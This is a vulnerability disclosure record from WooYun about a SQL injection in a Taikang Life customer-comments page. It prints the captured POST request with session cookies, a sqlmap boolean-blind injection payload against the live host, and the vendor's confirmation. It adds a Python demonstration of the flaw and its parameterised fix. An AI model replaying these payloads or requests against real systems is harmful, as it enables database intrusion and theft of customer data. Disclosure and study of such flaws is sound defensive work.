
Vulnerability Summary

Bug ID: wooyun-2015-0115379

Title: Taikang Life POST injection leaks user information site-wide

Vendor: taikang.com

Author: Me_Fortune

Submitted: 2015-05-21 17:56

Fixed: 2015-07-06 09:54

Published: 2015-07-06 09:54

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure timeline:

2015-05-21: Details sent to the vendor, awaiting vendor handling
2015-05-22: Vendor confirmed; details disclosed to the vendor only
2015-06-01: Details disclosed to core white hats and relevant domain experts
2015-06-11: Details disclosed to regular white hats
2015-06-21: Details disclosed to intern white hats
2015-07-06: Details disclosed to the public

Brief description:

As titled.

Details:

1. The captured request (the injection point is the status parameter in the POST body):

POST /eservice/comment/showUserComments.jsp HTTP/1.1
Host: ecs.taikang.com
Proxy-Connection: keep-alive
Content-Length: 95
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ecs.taikang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ecs.taikang.com/eservice/comment/showUserComments.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: BIGipServerpool_128=2768439050.30755.0000; tkmssid=d001f59c-93b4-4a9c-afad-7b6f37495faa; tkmtoken=73455fcf82793244562cdaed9ffb4e5f; pgv_pvi=3802278912; pgv_si=s7317284864; _pzfxuvpc=1432194814721%7C1385191079499157093%7C1%7C1432194814727%7C1%7C%7C1310137810426910490; _pzfxsvpc=1310137810426910490%7C1432194814721%7C1%7C; _pzfxsfc=; 4000095522mid=686_86; 4000095522slid=slid_746_32%7C; 4000095522is=2; 4000095522mh=1432195160687; tkmid=8110342; tkmname=bush; JSESSIONID=0000QIdhEdR8DHYgMN-DuTiY9kq:-1; SESS[MEMBER]=0f251966b09a09b4c81560df38d3abcd; loginName=bush; UNAME=bush; UNAME1=8110342; MLV=1; CUR=CNY; LANG=CN; S[MEMBERID]=8110342; _gscu_1984844848=32195257me0rcr20; _gscs_1984844848=321952579lj5e520|pv:13; _gscbrs_1984844848=1; _smt_uid=555d90b9.4efa8d45; Hm_lvt_b7f4a12c6b299f2870e826ec7b955f9a=1432119017,1432194815; Hm_lpvt_b7f4a12c6b299f2870e826ec7b955f9a=1432195406; OZ_1U_2132=vid=v55d91141ff81a.0&ctime=1432195409&ltime=1432195405
productvalue=&statusvalue=&begintime=2015-05-21&endtime=2015-05-21&status=&title=12345&product=


2. sqlmap output:

sqlmap identified the following injection points with a total of 1291 HTTP(s) requests:
---
Parameter: status (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: productvalue=&statusvalue=&begintime=2015-05-21&endtime=2015-05-21&status=-2873 OR 9504=9504&title=12345&product=
---
back-end DBMS: Oracle


3. [screenshot: 1.png]

4. [screenshot: 2.png]

5. [screenshot: 3.png]


6. I did not go any further; confirmed that this is not a test database.
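
The following Python script is an added illustration, not code from the original report or from Taikang: it models the query behind showUserComments.jsp on an in-memory SQLite table (table name, columns and sample rows are assumptions; the real backend is Oracle) to show why status=-2873 OR 9504=9504 returns every customer's rows while 9504=9505 returns none, which is the true/false difference sqlmap keyed on, and how binding a type-checked parameter closes it.

```python
import sqlite3

# Constructed sample rows standing in for the comment table behind
# showUserComments.jsp; table and column names are assumptions.
ROWS = [
    (1, 8110342, 1),   # (id, user_id, status) for the logged-in customer
    (2, 8110342, 2),
    (3, 7000001, 1),   # other customers' rows that must never be returned
    (4, 7000002, 1),
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_comments (id INTEGER, user_id INTEGER, status INTEGER)")
    db.executemany("INSERT INTO user_comments VALUES (?, ?, ?)", ROWS)
    return db

def vulnerable_query(db, user_id, status):
    """Concatenates the filter; it is only appended when status is non-empty,
    which is why the captured request with status= still produced valid SQL."""
    sql = f"SELECT id, user_id FROM user_comments WHERE user_id = {int(user_id)}"
    if status:
        sql += f" AND status = {status}"   # unquoted numeric context, unvalidated
    return db.execute(sql).fetchall()       # AND binds tighter than OR: 'OR 9504=9504' matches every row

def hardened_query(db, user_id, status):
    """Same filter logic, with status type-checked and bound as a parameter."""
    sql = "SELECT id, user_id FROM user_comments WHERE user_id = ?"
    params = [int(user_id)]
    if status:
        sql += " AND status = ?"
        params.append(int(status))         # ValueError for '-2873 OR 9504=9504'
    return db.execute(sql, params).fetchall()

def leaks_other_users(rows, user_id):
    """True if the result set contains another customer's rows."""
    return any(r[1] != user_id for r in rows)

def hardened_rejects(db, user_id, status):
    """True if the hardened query refuses the value instead of running it."""
    try:
        hardened_query(db, user_id, status)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db, me = make_db(), 8110342   # tkmid from the cookie in the captured request
    print(leaks_other_users(vulnerable_query(db, me, "-2873 OR 9504=9504"), me))  # True
    print(hardened_rejects(db, me, "-2873 OR 9504=9504"))  # True
```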

Proof of vulnerability:

Suggested fix:

Copyright notice: when reposting, please credit Me_Fortune@WooYun


Vendor Response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-05-22 09:53

Vendor reply:

Taikang Life thanks you for finding and reporting this to us; staff have been assigned to handle it!

Latest status:

None yet